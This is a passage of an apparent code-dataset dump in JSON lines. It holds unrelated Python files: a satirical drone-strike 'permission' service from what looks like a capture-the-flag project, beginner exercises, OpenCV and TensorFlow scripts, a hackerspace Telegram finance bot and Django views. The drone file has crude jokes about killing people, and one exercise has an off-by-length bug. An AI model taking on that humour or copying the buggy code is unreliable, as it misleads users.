sys.stdout.write(CREECH_LOGO)\n sys.stdout.write(MAIN_SCREEN)\n no = read_prompt()\n if no == '1':\n self._get_permission()\n elif no == '2':\n return False\n return True\n\n\n def _get_permission(self):\n \"\"\"Ask the soldier for details about his planned operation.\n\n The soldiers asks for permission to execute a specific drone operation.\n He can choose if he want to trace or kill the terrorist. If HIS drone\n operation was already executed he can also ask for the results of the\n operation.\n\n The supervisor will give a signed order if he permits the operation.\n This order can be given to Ramstein to execute the operation.\n\n Since we are in the war of terror permission is likely to be given.\n \"\"\"\n clear_screen()\n sys.stdout.write(CREECH_LOGO)\n sys.stdout.write(PERMISSION_SCREEN)\n operation = read_prompt()\n if operation not in ('trace', 'kill', 'peace'):\n sys.stdout.write('Are you too stupid? Army has seen better soldiers than you!\\n')\n self._dismiss()\n return\n if operation == 'peace':\n sys.stdout.write('This is WAR on terror, not peace on terror!\\n')\n sys.stdout.write('We have to creat^W kill more terrorists.\\n')\n self._dismiss()\n return\n elif operation in ('trace', 'kill'):\n if operation == 'trace':\n sys.stdout.write('Which terrorist should be traced?\\n')\n elif operation == 'kill':\n sys.stdout.write('Which terrorist should be killed?\\n')\n terrorist = read_prompt()\n if terrorist.lower() == 'obama':\n sys.stdout.write('Did you mean Osama? [yes/no]\\n')\n if read_prompt().lower() != 'yes':\n sys.stdout.write('Idiot! 
This is our president.\\n')\n sys.stdout.write('[mumbles to himself: He might be a terrorist too]\\n')\n self._dismiss()\n return\n else:\n sys.stdout.write('He was already murdered, but I guess there are more Osamas.\\n')\n sys.stdout.write('\\n')\n if os.path.exists(self._get_operation_filename(terrorist)):\n sys.stdout.write('There is already an ongoing operation against {}.\\n'.format(terrorist))\n sys.stdout.write('Anyway, thank you helping us in our war on terror.\\n')\n hit_enter()\n return\n\n\n sys.stdout.write('Secret notes regarding this target?\\n')\n notes = read_prompt()\n\n operation_data = {\n 'operation': operation,\n 'terrorist': terrorist,\n 'notes': notes\n }\n self._store_operation(operation_data)\n self._grant_permission(operation, terrorist)\n\n def _grant_permission(self, operation, terrorist):\n \"\"\"Grants permission to an operation.\n\n The soldiers gets a signed order which can be passed to Ramstein to\n execute the drone operation.\n \"\"\"\n order = base32(encode_parameters(self.secret_key, {\n 'operation': operation,\n 'terrorist': terrorist\n }))\n order_getresult = base32(encode_parameters(self.secret_key, {\n 'operation': 'getresult',\n 'terrorist': terrorist\n }))\n\n sys.stdout.write('\\nPermission granted!\\n\\n')\n sys.stdout.write('{} order: '.format(operation))\n sys.stdout.write(order)\n sys.stdout.write('\\ngetresult order: ')\n sys.stdout.write(order_getresult)\n sys.stdout.write('\\n\\nYou can use these signed orders in Ramstein!\\n')\n sys.stdout.write('The first order can be used to execute the drone operation.\\n')\n sys.stdout.write('The second order can be used to retrieve the results.\\n')\n hit_enter()\n\n def _dismiss(self):\n \"\"\" The soldier misbehaved. Either return him or kill his connection. 
\"\"\"\n sys.stdout.write('Dismiss!\\n')\n sys.stdout.write(' [colleague whispers to you: Say \"Affirmative!\"]\\n')\n if read_prompt().lower() != 'affirmative!':\n sys.exit(1)\n\n #\n # Utility functions\n #\n\n def _store_operation(self, operation_data):\n filename = self._get_operation_filename(operation_data['terrorist'])\n with open(filename, 'w') as f:\n os.fchmod(f.fileno(), stat.S_IRUSR | stat.S_IWUSR)\n json.dump(operation_data, f)\n\n def _load_operation(self, terrorist):\n filename = self._get_operation_filename(terrorist)\n try:\n with open(filename, 'r') as f:\n return json.load(f)\n except IOError:\n return None\n\n def _get_operation_filename(self, terrorist):\n return os.path.join(self.base_dir, 'rw', 'operations',\n hashify(self.secret_key, terrorist) + '.json')\n","sub_path":"KaaS/ro/creech.py","file_name":"creech.py","file_ext":"py","file_size_in_byte":6111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"641970543","text":"#!/usr/bin/env python3\n\n## read a list of numbers\n## for each number print the corresponding\n## person's name from the list\n\npeople = ['fred',\n 'betty',\n 'barney',\n 'dino',\n 'wilma',\n 'pebbles',\n 'bamm-bamm']\n\nprint(\"Enter a list of numbers: \")\n\nindices = []\nwhile True:\n try:\n indices.append(int(input()))\n except:\n break\n\nprint()\nfor idx in indices:\n if idx < 1 or idx > len(indices): continue\n\n print(\"{}\".format(people[idx - 1]))\n\n","sub_path":"ch2/exo2.py","file_name":"exo2.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"473736367","text":"\r\n\r\nNumber = float(input(\"What's your number: \"))\r\nModulus = Number%2\r\nModulus_four = Number%4\r\nif Modulus == 0:\r\n print(\"Even Number.\")\r\n if Modulus_four == 0:\r\n print(\"It's also multiple of 4 !!\")\r\nelse:\r\n print(\"Odd\")\r\n","sub_path":"Exercise25_Guessing Game Two.py","file_name":"Exercise25_Guessing Game Two.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"460992530","text":"import cv2\nimport numpy as np\nfor i in range(0,19):\n img = cv2.imread('edcurrent\\\\cropimage'+str(i)+'_onlyhead.jpg', 0)\n print('edcurrent\\\\cropimage'+str(i)+'_onlyhead.jpg')\n print('\\n',img.shape)\n img = cv2.medianBlur(img, 5)\n cimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n\n circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 35,\n param1=20, param2=8, minRadius=5, maxRadius=13)\n if circles is not None:\n circles = np.uint16(np.around(circles))\n print(circles.shape,'\\n',len(img))\n for i in circles[0, :]:\n # draw the outer circle\n cv2.circle(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)\n # draw the center of the circle\n cv2.circle(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)\n\n cv2.imshow('detected circles', cimg)\n cv2.waitKey(1000)\n cv2.destroyAllWindows()\n","sub_path":"HoughCircles.py","file_name":"HoughCircles.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"526034708","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom fetch_data import get_data\n\n\ndef main(_):\n\n path_to_data_folder = './data/'\n\n window_size = 256\n smooth_size = 4\n matrix_size = 
int(window_size/smooth_size) + int((window_size - smooth_size/2)/smooth_size)\n\n ## get_data() should return :\n ## - X_train and X_test as lists of feature matrices of shape (35 , 256)\n ## - Y_train and Y_test as lists of labels (encoded as one-hot vectors)\n X_train, Y_train, X_test, Y_test = get_data(path_to_data_folder)\n\n n_features = len(X_train[0][0])\n n_clients = len(Y_train[0])\n\n dim_gru_1 = 256 # number of units of gru_1\n dim_gru_2 = 256 # number of units of gru_2\n dim_fc1 = 50 # number of units of fc1\n auto_lamb = 1e-7 # regularisation factor in autoencoder loss\n\n batch_size = 20\n epoch = 30\n\n x = tf.placeholder(tf.float32, [None, matrix_size, n_features])\n y = tf.placeholder(tf.float32, [None, n_clients])\n\n ## GRU layers\n stacked_gru = tf.contrib.rnn.MultiRNNCell([tf.nn.rnn_cell.GRUCell(dim_gru_1), tf.nn.rnn_cell.GRUCell(dim_gru_2)])\n stacked_gru_outputs, final_state = tf.nn.dynamic_rnn(stacked_gru, x, dtype=tf.float32)\n\n ## We take the last prediction of the stacked gru as input of dropout layer\n gru_outputs = tf.transpose(stacked_gru_outputs, [1, 0, 2])\n last_gru_output = tf.gather(gru_outputs, int(gru_outputs.get_shape()[0]) - 1)\n\n ## DROPOUT layer\n keep_prob = tf.placeholder(tf.float32)\n dropout = tf.nn.dropout(last_gru_output, keep_prob)\n\n ## AUTOENCODER layers\n fc1_weight = tf.Variable(tf.truncated_normal([dim_gru_2, dim_fc1]))\n fc1_bias = tf.Variable(tf.constant(0.1, shape=[dim_fc1]))\n fc1_output = tf.nn.relu(tf.matmul(dropout, fc1_weight) + fc1_bias)\n\n fc2_weight = tf.Variable(tf.truncated_normal([dim_fc1, dim_gru_2]))\n fc2_bias = tf.Variable(tf.constant(0.1, shape=[dim_gru_2]))\n fc2_output = tf.nn.tanh(tf.matmul(fc1_output, fc2_weight) + fc2_bias)\n\n ## AUTOENCODER loss\n autoencoder_reg = auto_lamb * tf.norm(fc1_output, ord=1, axis=1)\n autoencoder_loss = tf.norm(tf.subtract(fc2_output, dropout), ord=2, axis=1)\n autoencoder_total_loss = tf.reduce_mean(autoencoder_loss + autoencoder_reg)\n\n ## CLASSIFICATION layers\n fc3_weight = tf.Variable(tf.truncated_normal([dim_gru_2, int(y.get_shape()[1])]))\n fc3_bias = tf.Variable(tf.constant(0.1, shape=[y.get_shape()[1]]))\n fc3_output = tf.matmul(dropout, fc3_weight) + fc3_bias\n\n ## CLASSIFICATION loss\n softmax_losses = tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=fc3_output)\n softmax_mean_loss = tf.reduce_mean(softmax_losses)\n\n ## GLOBAL LOSS and accuracy\n total_loss = softmax_mean_loss + autoencoder_total_loss\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(fc3_output, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n train_step = tf.train.AdamOptimizer(1e-3).minimize(total_loss)\n\n sess = tf.Session()\n init_op = tf.initialize_all_variables()\n sess.run(init_op)\n\n no_of_batches = int(len(X_train) / batch_size)\n\n ## TRAINING\n for i in range(epoch):\n X_train, Y_train = shuffle(X_train, Y_train)\n ptr = 0\n for j in range(no_of_batches):\n inp, out = X_train[ptr:ptr + batch_size], Y_train[ptr:ptr + batch_size]\n ptr += batch_size\n sess.run(train_step, feed_dict={x: inp, y: out, keep_prob: 0.5})\n\n if j % 100 == 1:\n fc1_out, test_accuracy = sess.run([fc1_output, accuracy], feed_dict={x: X_test, y: Y_test, keep_prob: 1})\n non_zero_elements = fc1_out[np.nonzero(fc1_out)]\n print (non_zero_elements.size)\n print(\"fc1_outputs = \")\n print(fc1_out) # it tends to become a zero vector from epoch [5, 10]\n print(\"Epoch: \" + str(i) +\n \", iter: \" + str(i*no_of_batches + j) +\n \" Testing Accuracy= 
{:.5f}\".format(test_accuracy))\n sess.close()\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"639048026","text":"import datetime\nimport glob\nimport logging\nimport os\nfrom typing import Dict, Generic, List, Literal, NewType, Optional, Tuple, TypeVar, TypedDict, Union\n\nimport requests\nfrom telegram import Update\nfrom telegram.ext import CallbackContext, CommandHandler, Updater\nfrom telegram.files.location import Location\nfrom telegram.files.venue import Venue\nfrom telegram.parsemode import ParseMode\n\nlogger = logging.getLogger()\n\nTOKEN = os.environ[\"TOKEN\"]\nURL_HLEDGER = os.environ[\"URL_HLEDGER\"]\n\nHLedgerCommoditySymbol = NewType(\"HLedgerCommoditySymbol\", str)\nHLedgerAccountName = NewType(\"HLedgerAccountName\", str)\nHLedgerTag = NewType(\"HLedgerTag\", Tuple[str, str])\nHLedgerFormatedDate = NewType(\"HLedgerFormatedDate\", str)\n\n\ndef to_hledger_date(date: datetime.datetime) -> HLedgerFormatedDate:\n return HLedgerFormatedDate(date.strftime(\"%Y-%m-%d\"))\n\n\nBRL = HLedgerCommoditySymbol(\"BRL\")\nKaristonAccount = HLedgerAccountName(\"KaristonAccount\")\n\n\nclass AmountPrecision(TypedDict):\n tag: Union[Literal[\"NaturalPrecision\"]]\n contents: Tuple\n\n\ndef build_amount_precision() -> AmountPrecision:\n return AmountPrecision(\n contents=(),\n tag=\"NaturalPrecision\"\n )\n\n\nclass HLedgerAmountStyle(TypedDict):\n ascommodityside: Union[Literal[\"L\", \"R\"]]\n ascommodityspaced: bool\n asprecision: AmountPrecision\n asdecimalpoint: None\n asdigitgroups: Tuple[str, List[int]]\n\n\ndef build_amount_style() -> HLedgerAmountStyle:\n return HLedgerAmountStyle(\n ascommodityside=\"L\",\n ascommodityspaced=True,\n asprecision=build_amount_precision(),\n asdecimalpoint=None,\n asdigitgroups=(\",\", [3])\n )\n\n\nclass HLedgerQuantity(TypedDict):\n floatingPoint: float\n decimalPlaces: int\n decimalMantissa: int\n\n\ndef to_hledger_quantity(value: float) -> HLedgerQuantity:\n return HLedgerQuantity(\n floatingPoint=value,\n decimalMantissa=int(value * 100),\n decimalPlaces=2\n )\n\n\nclass HLedgerAmount(TypedDict):\n acommodity: HLedgerCommoditySymbol\n aquantity: HLedgerQuantity\n aismultiplier: bool\n astyle: HLedgerAmountStyle\n aprice: None\n\n\ndef build_amount(quantity: float) -> HLedgerAmount:\n return HLedgerAmount(\n acommodity=BRL,\n aquantity=to_hledger_quantity(quantity),\n aismultiplier=False,\n astyle=build_amount_style(),\n aprice=None,\n )\n\n\nclass HLedgerTPosting(TypedDict):\n pdate: Optional[HLedgerFormatedDate]\n pdate2: Optional[HLedgerFormatedDate]\n pstatus: Union[\n Literal[\n \"Unmarked\",\n \"Pending\",\n \"Cleared\"\n ]\n ]\n paccount: HLedgerAccountName\n pamount: List[HLedgerAmount]\n pcomment: str\n ptype: Union[\n Literal[\n \"RegularPosting\",\n \"VirtualPosting\",\n \"BalancedVirtualPosting\"\n ]\n ]\n ptags: List[HLedgerTag]\n pbalanceassertion: None\n ptransaction: None\n poriginal: None\n\n\ndef build_posting(account: HLedgerAccountName, quantity: float) -> HLedgerTPosting:\n return HLedgerTPosting(\n pdate=None,\n pdate2=None,\n pstatus=\"Unmarked\",\n paccount=account,\n pamount=[build_amount(quantity)],\n pcomment=\"\",\n ptype=\"RegularPosting\",\n ptags=[],\n pbalanceassertion=None,\n ptransaction=None,\n poriginal=None,\n )\n\n\nclass HLedgerJournalSourcePos(TypedDict):\n contents: Tuple[str, Tuple[int, int]]\n tag: 
Literal[\"JournalSourcePos\"]\n\n\ndef build_source_pos() -> HLedgerJournalSourcePos:\n return HLedgerJournalSourcePos(\n contents=(\"\", (1, 1)),\n tag=\"JournalSourcePos\"\n )\n\n\nclass HLedgerTransaction(TypedDict):\n tindex: int\n tprecedingcomment: str\n tsourcepos: HLedgerJournalSourcePos\n tdate: HLedgerFormatedDate\n tdate2: None\n tstatus: Union[\n Literal[\"Unmarked\"],\n Literal[\"Pending\"],\n Literal[\"Cleared\"]\n ]\n tcode: str\n tdescription: str\n tcomment: str\n ttags: List[HLedgerTag]\n tpostings: List[HLedgerTPosting]\n\n\ndef build_transaction(\n description: str,\n tags: Dict[str, str],\n account_a: HLedgerAccountName,\n account_b: HLedgerAccountName,\n value: float\n) -> HLedgerTransaction:\n return HLedgerTransaction(\n tindex=0,\n tprecedingcomment=\"\",\n tsourcepos=build_source_pos(),\n tdate=to_hledger_date(datetime.datetime.utcnow()),\n tdate2=None,\n tstatus=\"Unmarked\",\n tcode=\"\",\n tdescription=description,\n tcomment=\"\",\n ttags=[HLedgerTag((tag, value)) for tag, value in tags.items()],\n tpostings=[\n build_posting(account_a, -value),\n build_posting(account_b, value),\n ],\n )\n\n\ndef add_new_donation(update: Update, context: CallbackContext):\n if update.effective_user:\n donation_transaction: HLedgerTransaction = build_transaction(\n account_b=KaristonAccount,\n account_a=HLedgerAccountName(\n f\"member::{update.effective_user.first_name}_{update.effective_user.last_name}\"\n ),\n tags={\n \"type\": \"donation\",\n \"member\": update.effective_user.full_name\n },\n description=f\"Donation from {update.effective_user.full_name}\",\n value=10\n )\n response = requests.put(\n f\"{URL_HLEDGER}/add\", json=donation_transaction\n )\n response.raise_for_status()\n\n\n# COMANDOS ESTATICOS:\ndef localizacao(update: Update, context: CallbackContext):\n if update.effective_chat and update.effective_message:\n update.effective_chat.send_venue(\n reply_to_message_id=update.effective_message.message_id,\n venue=Venue(\n title=\"Hackerspace Maringá\",\n address=\"R. 
Vitória, 943 - Vila Esperanca, Maringá - PR\",\n                google_place_id=\"ChIJr9L4qzLR7JQRWi8Anh8JyCI\",\n                google_place_type=\"zoo\",\n                location=Location(latitude=-23.402309060129333,\n                                  longitude=-51.93850697016083)))\n\n\ndef regras(update: Update, context: CallbackContext):\n    if update.effective_chat and update.effective_message:\n        update.effective_chat.send_message(\n            reply_to_message_id=update.effective_message.message_id,\n            text=open(\"static_messages/rules.md\").read(),\n            parse_mode=ParseMode.MARKDOWN_V2)\n\n\ndef help(update: Update, context: CallbackContext):\n    if update.effective_chat and update.effective_message:\n        update.effective_chat.send_message(\n            reply_to_message_id=update.effective_message.message_id,\n            text=open(\"static_messages/rules.md\").read(),\n            parse_mode=ParseMode.MARKDOWN_V2)\n\n\n# DYNAMIC COMMANDS:\ndef newsletter(update: Update, context: CallbackContext):\n    newest_file = max(glob.iglob('./news/*.pdf'), key=os.path.getctime)\n    if update.effective_chat and update.effective_message:\n        update.effective_chat.send_document(\n            open(newest_file, \"rb\"),\n            reply_to_message_id=update.effective_message.message_id,\n            filename=\"newsletter_hs_maringa.pdf\",\n            caption=\"Newsletter Hackerspace Maringá\")\n\n\ndef finance_summary(update: Update, context: CallbackContext):\n    requests.get(\"http://localhost:5000/accounts/\")\n\n\ndef main() -> None:\n    updater = Updater(token=TOKEN, use_context=True)\n\n    dispatcher = updater.dispatcher\n\n    # STATIC COMMANDS\n    dispatcher.add_handler(CommandHandler('address', localizacao))\n    dispatcher.add_handler(CommandHandler('rules', regras))\n    dispatcher.add_handler(CommandHandler('help', help))\n\n    # DYNAMIC COMMANDS\n    dispatcher.add_handler(CommandHandler('news', newsletter))\n\n    # FINANCE COMMANDS\n    dispatcher.add_handler(CommandHandler('donation', add_new_donation))\n\n    updater.start_polling()\n\n    updater.idle()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"boths/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":7931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"591227248","text":"\n\nfrom xai.brain.wordbase.verbs._stain import _STAIN\n\n# class header\nclass _STAINING(_STAIN, ):\n\tdef __init__(self,): \n\t\t_STAIN.__init__(self)\n\t\tself.name = \"STAINING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"stain\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_staining.py","file_name":"_staining.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"55707624","text":"from django.urls import path\n\nfrom .views import AuditiListView, StatusLhaView, StatusReviuView, DashboardView, get_jml_auditi_st\n\napp_name = 'siauApp'\n\nurlpatterns = [\n    path('ajax/get_auditi_st/', get_jml_auditi_st, name='getAuditiStUrl'),\n\n    path('auditi/', AuditiListView.as_view(), name='auditiListUrl'),\n    path('status-lha/', StatusLhaView.as_view(), name='statusLhaUrl'),\n    path('status-reviu/', StatusReviuView.as_view(), name='statusReviuUrl'),\n\n    path('', DashboardView.as_view(), name='indexUrl'),\n]\n","sub_path":"bagren/siau/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"6513635","text":"''' General config file for plotting and datacards.\nmuon-tau channel\n'''\nfrom htt_plot.tools.cut import Cut, Cuts\n\nchannel = 'mt'\n\n# 
binning\nfrom htt_plot.channels_configs.htt_common import bins\n\n# variables\nfrom htt_plot.channels_configs.htt_common import variables, datacards_variables, var_name_dict\n\n# cuts\nfrom htt_plot.channels_configs.htt_common import cut_mt_lepton, cut_mt_lepton_loose, cut_mt_lepton_tight, cuts_flags, cuts_vetoes, cut_l1_fakejet, cut_l2_fakejet, cut_os, cut_ss, cut_btag_1, cut_btag_2, cut_btag, cut_nobtag\n\ncut_dy_promptfakeleptons = Cut('l1_gen_match==1 || l1_gen_match==2 || l2_gen_match==1 || l2_gen_match==2')\n\ncuts_l1 = Cuts(\n l1_pt = 'l1_pt >= 21',\n l1_eta = 'abs(l1_eta) <= 2.1',\n l1_iso = 'l1_iso < 0.15',\n l1_vertex = 'abs(l1_d0) < 0.045 && abs(l1_dz) < 0.2',\n)\n\ncuts_l2 = Cuts(\n l2_pt = 'l2_pt >= 23',\n l2_eta = 'abs(l2_eta) <= 2.3',\n l2_iso = 'l2_byVVLooseIsolationMVArun2017v2DBoldDMwLT2017 > 0.5',\n l2_charge = 'abs(l2_q) == 1.',\n l2_vertex = 'abs(l2_dz) < 0.2',\n l2_decaymode = 'l2_decayModeFinding > 0.5',\n)\n\ncuts_against_leptons = Cuts(\n l2_against_e = 'l2_againstElectronVLooseMVA6 > 0.5',\n l2_against_mu = 'l2_againstMuonTight3 > 0.5',\n)\n\n## triggers\ncuts_triggers = Cuts(\n singlemuon_24 = 'trg_singlemuon_24',\n singlemuon_27 = 'trg_singlemuon_27',\n crossmuon_mu24tau20 = 'trg_crossmuon_mu24tau20',\n crossmuon_mu20tau27 = 'trg_crossmuon_mu20tau27',\n)\n\ncut_triggers = cuts_triggers.any()\n\nbasic_cuts = cuts_flags.all() & cuts_vetoes.all() & cut_triggers & cut_os & cuts_against_leptons.all() & cuts_l1.all() & cuts_l2.all()\n\n## iso\ncuts_iso = Cuts(\n l2_VTight = 'l2_byVTightIsolationMVArun2017v2DBoldDMwLT2017 > 0.5',\n l2_Tight = 'l2_byTightIsolationMVArun2017v2DBoldDMwLT2017 > 0.5',\n l2_VLoose = 'l2_byVLooseIsolationMVArun2017v2DBoldDMwLT2017 > 0.5',\n l2_VVLoose = 'l2_byVVLooseIsolationMVArun2017v2DBoldDMwLT2017 > 0.5',\n)\n\n## cut embedding + no fakes (for MC)\n\ncut_embed = Cut('l1_gen_match == 4 && l2_gen_match == 5')\n\ncut_not_embed = ~cut_embed\n\ncut_fakes = Cut('l2_gen_match == 6')\n\ncut_not_fakes = ~cut_fakes\n\ncut_not_fakes_not_embed = cut_not_embed & cut_not_fakes\n\n## datacards\ncuts_datacards = Cuts(\n ZTT = 'l2_gen_match == 5',\n ZL = 'l2_gen_match < 6 && !(l2_gen_match == 5)',\n ZJ = 'l2_gen_match == 6',\n TTT = 'l2_gen_match == 5',\n TTJ = '!(l2_gen_match == 5)',\n VVT = '(l2_gen_match == 5)',\n VVJ = '!(l2_gen_match == 5)',\n WJ = '1',\n jetFakes = '1',\n data = '1',\n embed = 'l1_gen_match == 4 && l2_gen_match == 5',\n)\ncuts_datacards['ZLL'] = cuts_datacards['ZL'] | cuts_datacards['ZJ']\ncuts_datacards['TT'] = cuts_datacards['TTT'] | cuts_datacards['TTJ']\ncuts_datacards['VV'] = cuts_datacards['VVT'] | cuts_datacards['VVJ']\n\ncuts_datacards['TTL'] = cuts_datacards['ZL']\ncuts_datacards['VVL'] = cuts_datacards['ZL']\n\nfor VV_key in ['VVT', 'VVJ', 'VVL']:\n for process_type in ['Diboson', 'singleTop', 'EWK']:\n cuts_datacards['{}_{}'.format(process_type, VV_key)] = cuts_datacards[VV_key]\nfrom htt_plot.channels_configs.htt_common import datacard_processes\n\n# weights\nfrom htt_plot.channels_configs.htt_common import weights\nweights['MC'] = weights['l2_MC']\n\nemb_weight_simulation_sf = Cut('weight_generator')\nemb_weight_scale_factor = Cut('weight_embed_DoubleMuonHLT_eff * weight_embed_muonID_eff_l1 * weight_embed_muonID_eff_l2')\nemb_weight_lepton_sf = Cut('l1_weight_idiso*(l1_weight_trig_mt*(l1_pt>25)+((0.81*(l1_pt>=21 && l1_pt<22) + 0.82*(l1_pt>=22 && l1_pt<23) + 0.83*(l1_pt>=23))*(l1_pt<25)))')\nemb_weight_tau_leg_weight = Cut('(l1_pt>25)+(l1_pt >= 21 && l1_pt<25)*((l2_pt>=20 && l2_pt<25)*0.12714+(l2_pt>=25 && 
l2_pt<30)*0.46930+0.71983*(l2_pt>=30 && l2_pt<35) + 0.75209*(l2_pt>=35 && l2_pt<40) + 0.78164*(l2_pt>=40 && l2_pt<45) + 0.83241*(l2_pt>=45 && l2_pt<50) + 0.86694*(l2_pt>=50 && l2_pt<60) + 0.89966*(l2_pt>=60 && l2_pt<80) + 0.88534*(l2_pt>=80 && l2_pt<100) + 0.90095*(l2_pt>=100 && l2_pt<150) + 0.84402*(l2_pt>=150 && l2_pt<200) + (l2_pt>=200))')\nemb_weight_emb_tau_id = Cut('(l2_gen_match==5)*0.97+(l2_gen_match!=5)*1.0')\nemb_weight_emb_veto = Cut('(l1_gen_match==4 && l2_gen_match==5)*1.0')\n\nweights['embed'] = emb_weight_simulation_sf * emb_weight_scale_factor * emb_weight_lepton_sf * emb_weight_tau_leg_weight * emb_weight_emb_tau_id * emb_weight_emb_veto #* Cut('2.650559811')\n\nfor w in ['embed_track_1prong_up', 'embed_track_1prong_down', 'embed_track_3prong_up', 'embed_track_3prong_down']:\n weights[w] = weights['embed']\n\nweights['l1_fake'] = Cut('1.0')\nweights['l2_fake'] = Cut('l2_fakeweight')\n\n# datasets\nimport htt_plot.datasets.lucas_mt as datasets\n\ncut_signal = cuts_iso['l2_Tight'] & basic_cuts\n\n# categories\n\ncategories = {\n 'nobtag_tight' : cut_nobtag & cut_mt_lepton_tight,\n 'btag_tight' : cut_btag & cut_mt_lepton_tight,\n 'nobtag_loosemt' : cut_nobtag & cut_mt_lepton_loose,\n 'btag_loosemt' : cut_btag & cut_mt_lepton_loose,\n 'nobtag_Vloosemt' : cut_nobtag & ~cut_mt_lepton,\n 'btag_Vloosemt' : cut_btag & ~cut_mt_lepton,\n }\n\nmerging_categories = {\n 'nobtag' : ['nobtag_tight', 'nobtag_loosemt'],\n 'btag' : ['btag_tight', 'btag_loosemt'],\n 'tight' : ['nobtag_tight', 'btag_tight'],\n 'loosemt' : ['nobtag_loosemt', 'btag_loosemt'],\n 'Vloosemt' : ['nobtag_Vloosemt', 'btag_Vloosemt'],\n }\nmerging_categories['inclusive'] = merging_categories['btag']+merging_categories['nobtag']\nmerging_categories['allmt'] = merging_categories['inclusive']+merging_categories['Vloosemt']\n\nbasic_cuts_btag = basic_cuts & cut_btag\ncut_signal_btag = cuts_iso['l2_Tight'] & basic_cuts_btag\n\nbasic_cuts_nobtag = basic_cuts & cut_nobtag\ncut_signal_nobtag = cuts_iso['l2_Tight'] & basic_cuts_nobtag\n\n","sub_path":"channels_configs/mt.py","file_name":"mt.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"106556631","text":"import time\nimport pprint\n\nclass bench:\n\tdef __init__(self):\n\t\tself.__func = {}\n\n\tdef getFuncEntry(self):\n\t\treturn {\"timeCalled\":0, \"avgTime\":0, \"times\":[], \"slowest\":0, \"fastest\":0, \"total time\":0}\n\n\tdef called(self, funcName):\n\t\tif(not funcName in self.__func.keys()):\n\t\t\tself.__func[funcName] = self.getFuncEntry()\n\t\tself.__func[funcName][\"timeCalled\"] += 1\n\n\tdef executed(self, funcName, timeExec):\n\t\tself.__func[funcName][\"times\"].append(timeExec)\n\n\tdef compute(self):\n\t\tfor func in self.__func.keys():\n\t\t\tminTime = 99999999999999999999999999999999999\n\t\t\tmaxTime = 0\n\t\t\taccumulator = 0\n\t\t\tfor t in self.__func[func][\"times\"]:\n\t\t\t\tminTime = min(t, minTime)\n\t\t\t\tmaxTime = max(t, maxTime)\n\t\t\t\taccumulator += t\n\t\t\tself.__func[func][\"avgTime\"] = accumulator/self.__func[func][\"timeCalled\"]\n\t\t\tself.__func[func][\"slowest\"] = maxTime\n\t\t\tself.__func[func][\"fastest\"] = minTime\n\t\t\tself.__func[func][\"total time\"] = accumulator\n\n\tdef show(self):\n\t\tnewDic = {}\n\t\tfor f in self.__func.keys():\n\t\t\tnewEntry = {}\n\t\t\tfor f2 in self.__func[f].keys():\n\t\t\t\tif(f2 != \"times\"):\n\t\t\t\t\tnewEntry[f2] = self.__func[f][f2]\n\t\t\tnewDic[f] = newEntry\n\t\tpp = 
pprint.PrettyPrinter(indent = 4)\n\t\tprint()\n\t\tpp.pprint(newDic)\n\t\tprint()\n\n\n\nBENCH = bench()\n\ndef timeit(method):\n\n\tdef timed(*args, **kw):\n\t\tBENCH.called(repr(method))\n\t\tts = time.time()*1000\n\t\tresult = method(*args, **kw)\n\t\tte = time.time()*1000\n\t\tBENCH.executed(repr(method), te-ts)\n\t\treturn result\n\n\treturn timed","sub_path":"Basic/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"255464036","text":"\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, Http404\n\nimport datetime\nfrom datetime import timedelta\nfrom .models import Comment, Posts\nfrom .forms import PostForm, CommentForm\n\n\ndef post_list(request):\n post_list = [i for i in Posts.objects.all()]\n context = {\n 'post_list': post_list\n }\n return render(request, 'Post/post_list.html', context)\n\n\ndef post_detail(request, id):\n try:\n post = Posts.objects.get(pk=id)\n except Posts.DoesNotExist:\n raise Http404(\"Post was not found\")\n context = {\n 'posts': post\n }\n return render(request, 'Post/post_details.html', context)\n\ndef new_post(request):\n form = PostForm(request.POST or None)\n if request.method == \"POST\":\n if form.is_valid():\n form.save()\n return redirect('post_list')\n context = {\n 'form': form\n }\n return render(request, 'Post/post_form.html', context)\n\ndef update_post(request, id):\n updated_post = get_object_or_404(Posts, id=id)\n form = PostForm(request.POST or None, instance=updated_post)\n if form.is_valid():\n form.save()\n return redirect(post_list)\n return render(request, 'Post/post_form.html', {'form': form})\n\ndef delete_post(request, id):\n deleted_post = 